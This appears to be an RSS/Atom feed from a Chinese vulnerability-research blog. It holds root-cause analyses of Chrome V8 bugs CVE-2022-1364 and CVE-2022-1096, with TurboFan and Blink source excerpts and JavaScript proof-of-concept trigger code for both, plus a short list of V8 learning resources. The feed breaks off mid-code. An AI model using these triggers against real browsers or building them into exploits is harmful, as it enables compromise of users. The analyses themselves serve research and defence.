      <span class="k">const</span> <span class="n">VirtualObject</span><span class="o">*</span> <span class="n">vobject</span> <span class="o">=</span> <span class="n">current</span><span class="o">-&gt;</span><span class="n">GetVirtualObject</span><span class="p">(</span><span class="n">object</span><span class="p">);</span>
      <span class="n">Variable</span> <span class="n">var</span><span class="p">;</span>
      <span class="k">if</span> <span class="p">(</span><span class="n">vobject</span> <span class="o">&amp;&amp;</span> <span class="o">!</span><span class="n">vobject</span><span class="o">-&gt;</span><span class="n">HasEscaped</span><span class="p">()</span> <span class="o">&amp;&amp;</span>
          <span class="n">vobject</span><span class="o">-&gt;</span><span class="n">FieldAt</span><span class="p">(</span><span class="n">OffsetOfFieldAccess</span><span class="p">(</span><span class="n">op</span><span class="p">)).</span><span class="n">To</span><span class="p">(</span><span class="o">&amp;</span><span class="n">var</span><span class="p">))</span> <span class="p">{</span>
        <span class="n">current</span><span class="o">-&gt;</span><span class="n">Set</span><span class="p">(</span><span class="n">var</span><span class="p">,</span> <span class="n">value</span><span class="p">);</span>
        <span class="n">current</span><span class="o">-&gt;</span><span class="n">MarkForDeletion</span><span class="p">();</span>
      <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
        <span class="n">current</span><span class="o">-&gt;</span><span class="n">SetEscaped</span><span class="p">(</span><span class="n">object</span><span class="p">);</span>
        <span class="n">current</span><span class="o">-&gt;</span><span class="n">SetEscaped</span><span class="p">(</span><span class="n">value</span><span class="p">);</span>
      <span class="p">}</span>
      <span class="k">break</span><span class="p">;</span>
    <span class="p">}</span>
    <span class="p">...</span>
    <span class="k">case</span> <span class="n">IrOpcode</span><span class="o">::</span><span class="n">kLoadField</span><span class="p">:</span> <span class="p">{</span>
      <span class="n">Node</span><span class="o">*</span> <span class="n">object</span> <span class="o">=</span> <span class="n">current</span><span class="o">-&gt;</span><span class="n">ValueInput</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
      <span class="k">const</span> <span class="n">VirtualObject</span><span class="o">*</span> <span class="n">vobject</span> <span class="o">=</span> <span class="n">current</span><span class="o">-&gt;</span><span class="n">GetVirtualObject</span><span class="p">(</span><span class="n">object</span><span class="p">);</span>
      <span class="n">Variable</span> <span class="n">var</span><span class="p">;</span>
      <span class="n">Node</span><span class="o">*</span> <span class="n">value</span><span class="p">;</span>
      <span class="k">if</span> <span class="p">(</span><span class="n">vobject</span> <span class="o">&amp;&amp;</span> <span class="o">!</span><span class="n">vobject</span><span class="o">-&gt;</span><span class="n">HasEscaped</span><span class="p">()</span> <span class="o">&amp;&amp;</span>
          <span class="n">vobject</span><span class="o">-&gt;</span><span class="n">FieldAt</span><span class="p">(</span><span class="n">OffsetOfFieldAccess</span><span class="p">(</span><span class="n">op</span><span class="p">)).</span><span class="n">To</span><span class="p">(</span><span class="o">&amp;</span><span class="n">var</span><span class="p">)</span> <span class="o">&amp;&amp;</span>
          <span class="n">current</span><span class="o">-&gt;</span><span class="n">Get</span><span class="p">(</span><span class="n">var</span><span class="p">).</span><span class="n">To</span><span class="p">(</span><span class="o">&amp;</span><span class="n">value</span><span class="p">))</span> <span class="p">{</span>
        <span class="n">current</span><span class="o">-&gt;</span><span class="n">SetReplacement</span><span class="p">(</span><span class="n">value</span><span class="p">);</span>
      <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
        <span class="n">current</span><span class="o">-&gt;</span><span class="n">SetEscaped</span><span class="p">(</span><span class="n">object</span><span class="p">);</span>
      <span class="p">}</span>
      <span class="k">break</span><span class="p">;</span>
    <span class="p">}</span>
    <span class="p">...</span>
    <span class="k">case</span> <span class="n">IrOpcode</span><span class="o">::</span><span class="n">kStateValues</span><span class="p">:</span>
    <span class="k">case</span> <span class="n">IrOpcode</span><span class="o">::</span><span class="n">kFrameState</span><span class="p">:</span>
      <span class="c1">// These uses are always safe.</span>
      <span class="k">break</span><span class="p">;</span>
    <span class="nl">default:</span> <span class="p">{</span>
      <span class="c1">// For unknown nodes, treat all value inputs as escaping.</span>
      <span class="kt">int</span> <span class="n">value_input_count</span> <span class="o">=</span> <span class="n">op</span><span class="o">-&gt;</span><span class="n">ValueInputCount</span><span class="p">();</span>
      <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">value_input_count</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">Node</span><span class="o">*</span> <span class="n">input</span> <span class="o">=</span> <span class="n">current</span><span class="o">-&gt;</span><span class="n">ValueInput</span><span class="p">(</span><span class="n">i</span><span class="p">);</span>
        <span class="n">current</span><span class="o">-&gt;</span><span class="n">SetEscaped</span><span class="p">(</span><span class="n">input</span><span class="p">);</span>
      <span class="p">}</span>
      <span class="k">if</span> <span class="p">(</span><span class="n">OperatorProperties</span><span class="o">::</span><span class="n">HasContextInput</span><span class="p">(</span><span class="n">op</span><span class="p">))</span> <span class="p">{</span>
        <span class="n">current</span><span class="o">-&gt;</span><span class="n">SetEscaped</span><span class="p">(</span><span class="n">current</span><span class="o">-&gt;</span><span class="n">ContextInput</span><span class="p">());</span>
      <span class="p">}</span>
      <span class="k">break</span><span class="p">;</span>
    <span class="p">}</span>
  <span class="p">}</span>
<span class="p">}</span>

<span class="k">const</span> <span class="n">VirtualObject</span><span class="o">*</span> <span class="n">InitVirtualObject</span><span class="p">(</span><span class="kt">int</span> <span class="n">size</span><span class="p">)</span> <span class="p">{</span>
  <span class="n">DCHECK_EQ</span><span class="p">(</span><span class="n">IrOpcode</span><span class="o">::</span><span class="n">kAllocate</span><span class="p">,</span> <span class="n">current_node</span><span class="p">()</span><span class="o">-&gt;</span><span class="n">opcode</span><span class="p">());</span>
  <span class="n">VirtualObject</span><span class="o">*</span> <span class="n">vobject</span> <span class="o">=</span> <span class="n">tracker_</span><span class="o">-&gt;</span><span class="n">virtual_objects_</span><span class="p">.</span><span class="n">Get</span><span class="p">(</span><span class="n">current_node</span><span class="p">());</span>
  <span class="k">if</span> <span class="p">(</span><span class="n">vobject</span><span class="p">)</span> <span class="p">{</span>
	<span class="n">CHECK</span><span class="p">(</span><span class="n">vobject</span><span class="o">-&gt;</span><span class="n">size</span><span class="p">()</span> <span class="o">==</span> <span class="n">size</span><span class="p">);</span>
  <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
	<span class="n">vobject</span> <span class="o">=</span> <span class="n">tracker_</span><span class="o">-&gt;</span><span class="n">NewVirtualObject</span><span class="p">(</span><span class="n">size</span><span class="p">);</span>
  <span class="p">}</span>
  <span class="k">if</span> <span class="p">(</span><span class="n">vobject</span><span class="p">)</span> <span class="n">vobject</span><span class="o">-&gt;</span><span class="n">AddDependency</span><span class="p">(</span><span class="n">current_node</span><span class="p">());</span>
  <span class="n">vobject_</span> <span class="o">=</span> <span class="n">vobject</span><span class="p">;</span>
  <span class="k">return</span> <span class="n">vobject</span><span class="p">;</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="n">SetVirtualObject</span><span class="p">(</span><span class="n">Node</span><span class="o">*</span> <span class="n">object</span><span class="p">)</span> <span class="p">{</span>
  <span class="n">vobject_</span> <span class="o">=</span> <span class="n">tracker_</span><span class="o">-&gt;</span><span class="n">virtual_objects_</span><span class="p">.</span><span class="n">Get</span><span class="p">(</span><span class="n">object</span><span class="p">);</span>
<span class="p">}</span>

<span class="o">~</span><span class="n">Scope</span><span class="p">()</span> <span class="p">{</span>
  <span class="k">if</span> <span class="p">(</span><span class="n">replacement_</span> <span class="o">!=</span> <span class="n">tracker_</span><span class="o">-&gt;</span><span class="n">replacements_</span><span class="p">[</span><span class="n">current_node</span><span class="p">()]</span> <span class="o">||</span>
	  <span class="n">vobject_</span> <span class="o">!=</span> <span class="n">tracker_</span><span class="o">-&gt;</span><span class="n">virtual_objects_</span><span class="p">.</span><span class="n">Get</span><span class="p">(</span><span class="n">current_node</span><span class="p">()))</span> <span class="p">{</span>
	<span class="n">reduction</span><span class="p">()</span><span class="o">-&gt;</span><span class="n">set_value_changed</span><span class="p">();</span>
  <span class="p">}</span>
  <span class="n">tracker_</span><span class="o">-&gt;</span><span class="n">replacements_</span><span class="p">[</span><span class="n">current_node</span><span class="p">()]</span> <span class="o">=</span> <span class="n">replacement_</span><span class="p">;</span>
  <span class="n">tracker_</span><span class="o">-&gt;</span><span class="n">virtual_objects_</span><span class="p">.</span><span class="n">Set</span><span class="p">(</span><span class="n">current_node</span><span class="p">(),</span> <span class="n">vobject_</span><span class="p">);</span> 
<span class="p">}</span>
</code></pre></div></div>

<p>分析完成后，<code class="language-plaintext highlighter-rouge">Reduction EscapeAnalysisReducer::Reduce(Node* node)</code> 根据之前的分析结果修改 IR, <code class="language-plaintext highlighter-rouge">EscapeAnalysisReducer::ReduceDeoptState</code> 就是在这个阶段被调用的。</p>

<p>分析了这么一大圈，在回过头来看 POC 代码, 终于理解了漏洞发生的原因，C(3) 的返回值是 b.a.call(arguments, b), 中的 arguments，由于这个对象是被函数捕获的，所以在 turbofan 编译过程中被优化掉了，在 turbofan 生成的代码中没有创建，C() 中使用 Error().stack 触发了这个对象的创建，但是创建的代码中有 BUG，多次 Error().stack 获取这个 arguments 对象时，每次都新创建一个出来，导致原本应该是指向同一个对象的 e.M 和 e.C 指向了两个不同的对象。</p>

<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code>  <span class="kd">function</span> <span class="nx">C</span><span class="p">(</span><span class="nx">z</span><span class="p">)</span> <span class="p">{</span>
    <span class="nb">Error</span><span class="p">.</span><span class="nx">prepareStackTrace</span> <span class="o">=</span> <span class="kd">function</span><span class="p">(</span><span class="nx">t</span><span class="p">,</span> <span class="nx">B</span><span class="p">)</span> <span class="p">{</span>
      <span class="k">return</span> <span class="nx">B</span><span class="p">[</span><span class="nx">z</span><span class="p">].</span><span class="nx">getThis</span><span class="p">();</span>
    <span class="p">};</span>
    <span class="kd">let</span> <span class="nx">p</span> <span class="o">=</span> <span class="nb">Error</span><span class="p">().</span><span class="nx">stack</span><span class="p">;</span>
    <span class="nb">Error</span><span class="p">.</span><span class="nx">prepareStackTrace</span> <span class="o">=</span> <span class="kc">null</span><span class="p">;</span>
    <span class="k">return</span> <span class="nx">p</span><span class="p">;</span>
  <span class="p">}</span>
  <span class="kd">function</span> <span class="nx">J</span><span class="p">()</span> <span class="p">{}</span>
  <span class="kd">var</span> <span class="nx">optim</span> <span class="o">=</span> <span class="kc">false</span><span class="p">;</span>
  <span class="kd">var</span> <span class="nx">opt</span> <span class="o">=</span> <span class="k">new</span> <span class="nb">Function</span><span class="p">(</span>
      <span class="dl">'</span><span class="s1">a</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">b</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">c</span><span class="dl">'</span><span class="p">,</span>
      <span class="dl">'</span><span class="s1">if(typeof a===</span><span class="se">\'</span><span class="s1">number</span><span class="se">\'</span><span class="s1">){if(a&gt;2){for(var i=0;i&lt;100;i++);return;}b.d(a,b,1);return}</span><span class="dl">'</span> <span class="o">+</span>
          <span class="dl">'</span><span class="s1">g++;</span><span class="dl">'</span><span class="p">.</span><span class="nx">repeat</span><span class="p">(</span><span class="mi">70</span><span class="p">));</span>
  <span class="kd">var</span> <span class="nx">e</span> <span class="o">=</span> <span class="kc">null</span><span class="p">;</span>
  <span class="nx">J</span><span class="p">.</span><span class="nx">prototype</span><span class="p">.</span><span class="nx">d</span> <span class="o">=</span> <span class="k">new</span> <span class="nb">Function</span><span class="p">(</span>
      <span class="dl">'</span><span class="s1">a</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">b</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">"use strict";b.a.call(arguments,b);return arguments[a];</span><span class="dl">'</span><span class="p">);</span>
  <span class="nx">J</span><span class="p">.</span><span class="nx">prototype</span><span class="p">.</span><span class="nx">a</span> <span class="o">=</span> <span class="k">new</span> <span class="nb">Function</span><span class="p">(</span><span class="dl">'</span><span class="s1">a</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">a.b(0,a)</span><span class="dl">'</span><span class="p">);</span>
  <span class="nx">J</span><span class="p">.</span><span class="nx">prototype</span><span class="p">.</span><span class="nx">b</span> <span class="o">=</span> <span class="k">new</span> <span class="nb">Function</span><span class="p">(</span>
      <span class="dl">'</span><span class="s1">a</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">b</span><span class="dl">'</span><span class="p">,</span>
      <span class="dl">'</span><span class="s1">b.c();if(a){</span><span class="dl">'</span> <span class="o">+</span>
          <span class="dl">'</span><span class="s1">g++;</span><span class="dl">'</span><span class="p">.</span><span class="nx">repeat</span><span class="p">(</span><span class="mi">70</span><span class="p">)</span> <span class="o">+</span> <span class="dl">'</span><span class="s1">}</span><span class="dl">'</span><span class="p">);</span>
  <span class="nx">J</span><span class="p">.</span><span class="nx">prototype</span><span class="p">.</span><span class="nx">c</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span>
    <span class="k">if</span> <span class="p">(</span><span class="nx">optim</span><span class="p">)</span> <span class="p">{</span>
      <span class="kd">var</span> <span class="nx">z</span> <span class="o">=</span> <span class="nx">C</span><span class="p">(</span><span class="mi">3</span><span class="p">);</span>
      <span class="kd">var</span> <span class="nx">p</span> <span class="o">=</span> <span class="nx">C</span><span class="p">(</span><span class="mi">3</span><span class="p">);</span>
      <span class="nx">z</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
      <span class="nx">e</span> <span class="o">=</span> <span class="p">{</span><span class="na">M</span><span class="p">:</span> <span class="nx">z</span><span class="p">,</span> <span class="na">C</span><span class="p">:</span> <span class="nx">p</span><span class="p">};</span>
    <span class="p">}</span>
  <span class="p">};</span>
</code></pre></div></div>]]></content><author><name></name></author><summary type="html"><![CDATA[从 https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2022/CVE-2022-1364.html 得到漏洞影响的 Chrome 版本以及 POC 代码。]]></summary></entry><entry><title type="html">v8 资料汇总</title><link href="https://pwntips.github.io/2022/12/11/v8-documents.html" rel="alternate" type="text/html" title="v8 资料汇总" /><published>2022-12-11T00:00:00+08:00</published><updated>2022-12-11T00:00:00+08:00</updated><id>https://pwntips.github.io/2022/12/11/v8-documents</id><content type="html" xml:base="https://pwntips.github.io/2022/12/11/v8-documents.html"><![CDATA[<h2 id="v8-资料汇总">V8 资料汇总</h2>

<p>v8 的资料虽然很多，但是很多是非官方的资料，或者没有一个统一的所搜入口，今天在 v8-dev 用户组发现一个不错的帖子，里面包含一些我以前没搜到过的资料，我就想我干脆自己整理一份，把我觉得非常值得读的资料都列到一篇文章里，以后不断更新。</p>

<h3 id="121211-更新">12.12.11 更新</h3>

<p><img src="Pasted image 20221211203015.png" alt="截图" />
From: https://groups.google.com/g/v8-dev/c/J-lbjGeu6Yw</p>

<ul>
  <li>The best way to start with V8 is to play around “hello world” at <a href="https://v8.dev/docs/embed">https://v8.dev/docs/embed</a> to find out the basics.   – 这篇是 v8 团队发的官方文章，大体上是讲怎么把 v8 当作嵌入式解释器使用，中间讲了很多 v8 的基本概念，入门必读。</li>
  <li>Then, <a href="https://github.com/thlorenz/v8-perf/blob/master/README.md">https://github.com/thlorenz/v8-perf/blob/master/README.md</a> will give you some links to find out how V8 works internally  - 包含介绍 v8 内部实现的很多内容，包括很多 v8 团队发布很多 talk 的视频和文档，我今天刚知道这个，还没仔细看</li>
  <li><a href="https://v8.dev/docs">https://v8.dev/docs</a> will explain some workflows to use. - 官方文档，也包括了 v8 个方面的内容，和第二个有一些内容是重复的，例如想了解 turbofan 可以看 https://v8.dev/docs/turbofan ，个人感觉第二个的导航做的更好一些。</li>
</ul>]]></content><author><name></name></author><summary type="html"><![CDATA[V8 资料汇总]]></summary></entry><entry><title type="html">CVE-2022-1096 (WIP)</title><link href="https://pwntips.github.io/2022/11/26/CVE-2022-1096.html" rel="alternate" type="text/html" title="CVE-2022-1096 (WIP)" /><published>2022-11-26T00:00:00+08:00</published><updated>2022-11-26T00:00:00+08:00</updated><id>https://pwntips.github.io/2022/11/26/CVE-2022-1096</id><content type="html" xml:base="https://pwntips.github.io/2022/11/26/CVE-2022-1096.html"><![CDATA[<p>CVE-2022-1096 是 CVE-2021-30551 的变种。</p>

<h2 id="准备环境">准备环境</h2>

<p>阅读 <a href="https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2022/CVE-2022-1096.html">Google P0 的分析报告</a> 得知修复的版本是 99.0.4844.84，搜到对应的<a href="https://chromereleases.googleblog.com/2022/03/stable-channel-update-for-desktop_25.html">发布记录</a>，依照时间找到上一个版本是 <a href="https://chromereleases.googleblog.com/2022/03/stable-channel-update-for-desktop_20.html">99.0.4844.82</a>，使用 <a href="/2022/05/31/get-old-version-chrome-binary.html">获取旧版本的 Chrome</a> 中的方法构建出对应的二进制文件。</p>

<h2 id="分析成因">分析成因</h2>

<p>将 POC 代码稍加修改，方便调试：</p>

<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">style</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">createElement</span><span class="p">(</span><span class="dl">'</span><span class="s1">p</span><span class="dl">'</span><span class="p">).</span><span class="nx">style</span><span class="p">;</span>
<span class="nx">alert</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
<span class="nx">style</span><span class="p">.</span><span class="nx">prop</span> <span class="o">=</span> <span class="p">{</span> <span class="na">toString</span><span class="p">:</span> <span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span>
  <span class="nx">style</span><span class="p">.</span><span class="nx">prop</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
<span class="p">}};</span>
<span class="nx">alert</span><span class="p">(</span><span class="mi">2</span><span class="p">)</span>
</code></pre></div></div>

<p>根据之前调试 CVE-2021-30551 积累的经验，漏洞是在 v8/src/objects/objects.cc：<code class="language-plaintext highlighter-rouge">Object::SetProperty</code> 函数执行过程中触发的，在 alert(1) 弹出后，在 Object::SetProperty 函数开头下断点，然后点掉弹窗，让程序断下后开始调试。</p>

<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">Maybe</span><span class="o">&lt;</span><span class="kt">bool</span><span class="o">&gt;</span> <span class="n">Object</span><span class="o">::</span><span class="n">SetProperty</span><span class="p">(</span><span class="n">LookupIterator</span><span class="o">*</span> <span class="n">it</span><span class="p">,</span> <span class="n">Handle</span><span class="o">&lt;</span><span class="n">Object</span><span class="o">&gt;</span> <span class="n">value</span><span class="p">,</span>
                                <span class="n">StoreOrigin</span> <span class="n">store_origin</span><span class="p">,</span>
                                <span class="n">Maybe</span><span class="o">&lt;</span><span class="n">ShouldThrow</span><span class="o">&gt;</span> <span class="n">should_throw</span><span class="p">)</span> <span class="p">{</span>
  <span class="k">if</span> <span class="p">(</span><span class="n">it</span><span class="o">-&gt;</span><span class="n">IsFound</span><span class="p">())</span> <span class="p">{</span>
    <span class="kt">bool</span> <span class="n">found</span> <span class="o">=</span> <span class="nb">true</span><span class="p">;</span>
    <span class="n">Maybe</span><span class="o">&lt;</span><span class="kt">bool</span><span class="o">&gt;</span> <span class="n">result</span> <span class="o">=</span>
        <span class="n">SetPropertyInternal</span><span class="p">(</span><span class="n">it</span><span class="p">,</span> <span class="n">value</span><span class="p">,</span> <span class="n">should_throw</span><span class="p">,</span> <span class="n">store_origin</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">found</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">found</span><span class="p">)</span> <span class="k">return</span> <span class="n">result</span><span class="p">;</span>
  <span class="p">}</span>

  <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">CheckContextualStoreToJSGlobalObject</span><span class="p">(</span><span class="n">it</span><span class="p">,</span> <span class="n">should_throw</span><span class="p">))</span> <span class="p">{</span>
    <span class="k">return</span> <span class="n">Nothing</span><span class="o">&lt;</span><span class="kt">bool</span><span class="o">&gt;</span><span class="p">();</span>
  <span class="p">}</span>
  <span class="k">return</span> <span class="n">AddDataProperty</span><span class="p">(</span><span class="n">it</span><span class="p">,</span> <span class="n">value</span><span class="p">,</span> <span class="n">NONE</span><span class="p">,</span> <span class="n">should_throw</span><span class="p">,</span> <span class="n">store_origin</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>大体和 CVE-2021-30551 的流程一致，虽然 style 对象还没有名为 prop 的属性，但是由于 style 是设置了 INTERCEPTOR 的 DOM 对象， 属性的查找结果是找到了 INTERCEPTOR，it-&gt;IsFound() 条件满足，程序走到 SetPropertyInternal 中，经过多层调用，最终到达 V8CSSStyleDeclaration::NamedPropertySetterCallback 函调函数。</p>

<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="n">V8CSSStyleDeclaration</span><span class="o">::</span><span class="n">NamedPropertySetterCallback</span><span class="p">(</span>
    <span class="n">v8</span><span class="o">::</span><span class="n">Local</span><span class="o">&lt;</span><span class="n">v8</span><span class="o">::</span><span class="n">Name</span><span class="o">&gt;</span> <span class="n">v8_property_name</span><span class="p">,</span>
    <span class="n">v8</span><span class="o">::</span><span class="n">Local</span><span class="o">&lt;</span><span class="n">v8</span><span class="o">::</span><span class="n">Value</span><span class="o">&gt;</span> <span class="n">v8_property_value</span><span class="p">,</span>
    <span class="k">const</span> <span class="n">v8</span><span class="o">::</span><span class="n">PropertyCallbackInfo</span><span class="o">&lt;</span><span class="n">v8</span><span class="o">::</span><span class="n">Value</span><span class="o">&gt;&amp;</span> <span class="n">info</span><span class="p">)</span> <span class="p">{</span>
  <span class="n">RUNTIME_CALL_TIMER_SCOPE_DISABLED_BY_DEFAULT</span><span class="p">(</span>
      <span class="n">info</span><span class="p">.</span><span class="n">GetIsolate</span><span class="p">(),</span> <span class="s">"Blink_CSSStyleDeclaration_NamedPropertySetter"</span><span class="p">);</span>

  <span class="c1">// 3.9.2. [[Set]]</span>
  <span class="c1">// https://webidl.spec.whatwg.org/#legacy-platform-object-set</span>
  <span class="c1">// step 1. If O and Receiver are the same object, then:</span>
  <span class="k">if</span> <span class="p">(</span><span class="n">info</span><span class="p">.</span><span class="n">Holder</span><span class="p">()</span> <span class="o">==</span> <span class="n">info</span><span class="p">.</span><span class="n">This</span><span class="p">())</span> <span class="p">{</span>
    <span class="c1">// step 1.2.1. Invoke the named property setter with P and V.</span>
    <span class="n">v8</span><span class="o">::</span><span class="n">Isolate</span><span class="o">*</span> <span class="n">isolate</span> <span class="o">=</span> <span class="n">info</span><span class="p">.</span><span class="n">GetIsolate</span><span class="p">();</span>
    <span class="k">const</span> <span class="n">ExceptionState</span><span class="o">::</span><span class="n">ContextType</span> <span class="n">exception_state_context_type</span> <span class="o">=</span>
        <span class="n">ExceptionContext</span><span class="o">::</span><span class="n">Context</span><span class="o">::</span><span class="n">kNamedPropertySet</span><span class="p">;</span>
    <span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="k">const</span> <span class="n">class_like_name</span> <span class="o">=</span> <span class="s">"CSSStyleDeclaration"</span><span class="p">;</span>
    <span class="n">ExceptionState</span> <span class="n">exception_state</span><span class="p">(</span><span class="n">isolate</span><span class="p">,</span> <span class="n">exception_state_context_type</span><span class="p">,</span>
                                   <span class="n">class_like_name</span><span class="p">);</span>

    <span class="c1">// [CEReactions]</span>
    <span class="n">CEReactionsScope</span> <span class="n">ce_reactions_scope</span><span class="p">;</span>

    <span class="n">v8</span><span class="o">::</span><span class="n">Local</span><span class="o">&lt;</span><span class="n">v8</span><span class="o">::</span><span class="n">Object</span><span class="o">&gt;</span> <span class="n">v8_receiver</span> <span class="o">=</span> <span class="n">info</span><span class="p">.</span><span class="n">Holder</span><span class="p">();</span>
    <span class="n">CSSStyleDeclaration</span><span class="o">*</span> <span class="n">blink_receiver</span> <span class="o">=</span>
        <span class="n">V8CSSStyleDeclaration</span><span class="o">::</span><span class="n">ToWrappableUnsafe</span><span class="p">(</span><span class="n">v8_receiver</span><span class="p">);</span>
    <span class="n">v8</span><span class="o">::</span><span class="n">Local</span><span class="o">&lt;</span><span class="n">v8</span><span class="o">::</span><span class="n">Context</span><span class="o">&gt;</span> <span class="n">receiver_context</span> <span class="o">=</span>
        <span class="n">v8_receiver</span><span class="o">-&gt;</span><span class="n">GetCreationContextChecked</span><span class="p">();</span>
    <span class="n">ScriptState</span><span class="o">*</span> <span class="n">receiver_script_state</span> <span class="o">=</span> <span class="n">ScriptState</span><span class="o">::</span><span class="n">From</span><span class="p">(</span><span class="n">receiver_context</span><span class="p">);</span>
    <span class="n">ScriptState</span><span class="o">*</span> <span class="n">script_state</span> <span class="o">=</span> <span class="n">receiver_script_state</span><span class="p">;</span>
    <span class="k">const</span> <span class="n">AtomicString</span><span class="o">&amp;</span> <span class="n">blink_property_name</span> <span class="o">=</span>
        <span class="n">ToCoreAtomicString</span><span class="p">(</span><span class="n">v8_property_name</span><span class="p">.</span><span class="n">As</span><span class="o">&lt;</span><span class="n">v8</span><span class="o">::</span><span class="n">String</span><span class="o">&gt;</span><span class="p">());</span>
    <span class="c1">// 这里会把值转换成字符串，触发其 toString 方法的回调</span>
    <span class="k">auto</span><span class="o">&amp;&amp;</span> <span class="n">blink_property_value</span> <span class="o">=</span>
        <span class="n">NativeValueTraits</span><span class="o">&lt;</span><span class="n">IDLStringTreatNullAsEmptyString</span><span class="o">&gt;::</span><span class="n">ArgumentValue</span><span class="p">(</span>
            <span class="n">isolate</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="n">v8_property_value</span><span class="p">,</span> <span class="n">exception_state</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">UNLIKELY</span><span class="p">(</span><span class="n">exception_state</span><span class="p">.</span><span class="n">HadException</span><span class="p">()))</span> <span class="p">{</span>
      <span class="k">return</span><span class="p">;</span>
    <span class="p">}</span>
    <span class="k">auto</span><span class="o">&amp;&amp;</span> <span class="n">return_value</span> <span class="o">=</span> <span class="n">blink_receiver</span><span class="o">-&gt;</span><span class="n">AnonymousNamedSetter</span><span class="p">(</span>
        <span class="n">script_state</span><span class="p">,</span> <span class="n">blink_property_name</span><span class="p">,</span> <span class="n">blink_property_value</span><span class="p">);</span>
    <span class="n">bindings</span><span class="o">::</span><span class="n">V8SetReturnValue</span><span class="p">(</span><span class="n">info</span><span class="p">,</span> <span class="n">return_value</span><span class="p">);</span>
    <span class="c1">// CSSStyleDeclaration is abusing named properties.</span>
    <span class="c1">// Do not intercept if the property is not found.</span>
    <span class="k">return</span><span class="p">;</span>
  <span class="p">}</span>

  <span class="c1">// Do not intercept.  Fallback to OrdinarySetWithOwnDescriptor.</span>
<span class="p">}</span>
</code></pre></div></div>

<p>在 Interceptor 回调中有一个把属性值转换成字符串的操作，如果值是一个 object 的话，这里会调用它的 toString 方法，而 toString 方法里会再次设置 prop 属性，这次设置的值为 1，设置完成后控制流最终返回到外层的值设置中，乍看和 CVE-2021-30551 好像没什么区别，为什么 CVE-2021-30551 的补丁没有解决这个问题呢？ 仔细查看修补的地方发现，由于 CVE-2021-30551 漏洞触发需要将 DOM 对象 HTMLEmbed 作为普通对象的原型，所以其补丁代码放到了针对原型的属性设置代码路径上，并不能覆盖直接给 DOM 对象设置属性的情况。</p>

<hr />
<p>⚠️ 提示：由于 prop 属性并不是这个 Interceptor 期望处理的属性，AnonymousNamedSetter 的返回值为  <code class="language-plaintext highlighter-rouge">NamedPropertySetterResult::kDidNotIntercept</code> ，代表Interceptor 不处理此属性设置操作。 结果就是 Interceptor 在这个流程里实际只起了调用 toString 回调函数的作用，不影响实际赋值给 prop 属性的值。</p>

<hr />

<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">Maybe</span><span class="o">&lt;</span><span class="kt">bool</span><span class="o">&gt;</span> <span class="n">Object</span><span class="o">::</span><span class="n">SetPropertyInternal</span><span class="p">(</span><span class="n">LookupIterator</span><span class="o">*</span> <span class="n">it</span><span class="p">,</span>
                                        <span class="n">Handle</span><span class="o">&lt;</span><span class="n">Object</span><span class="o">&gt;</span> <span class="n">value</span><span class="p">,</span>
                                        <span class="n">Maybe</span><span class="o">&lt;</span><span class="n">ShouldThrow</span><span class="o">&gt;</span> <span class="n">should_throw</span><span class="p">,</span>
                                        <span class="n">StoreOrigin</span> <span class="n">store_origin</span><span class="p">,</span> <span class="kt">bool</span><span class="o">*</span> <span class="n">found</span><span class="p">)</span> <span class="p">{</span>
 <span class="p">...</span>

  <span class="k">do</span> <span class="p">{</span>
    <span class="k">switch</span> <span class="p">(</span><span class="n">it</span><span class="o">-&gt;</span><span class="n">state</span><span class="p">())</span> <span class="p">{</span>
      <span class="p">...</span>

      <span class="k">case</span> <span class="n">LookupIterator</span><span class="o">::</span><span class="n">INTERCEPTOR</span><span class="p">:</span> <span class="p">{</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">it</span><span class="o">-&gt;</span><span class="n">HolderIsReceiverOrHiddenPrototype</span><span class="p">())</span> <span class="p">{</span>
		    <span class="c1">/// CVE-2022-1096 的控制流会走这里</span>
          <span class="n">Maybe</span><span class="o">&lt;</span><span class="kt">bool</span><span class="o">&gt;</span> <span class="n">result</span> <span class="o">=</span>
              <span class="n">JSObject</span><span class="o">::</span><span class="n">SetPropertyWithInterceptor</span><span class="p">(</span><span class="n">it</span><span class="p">,</span> <span class="n">should_throw</span><span class="p">,</span> <span class="n">value</span><span class="p">);</span>
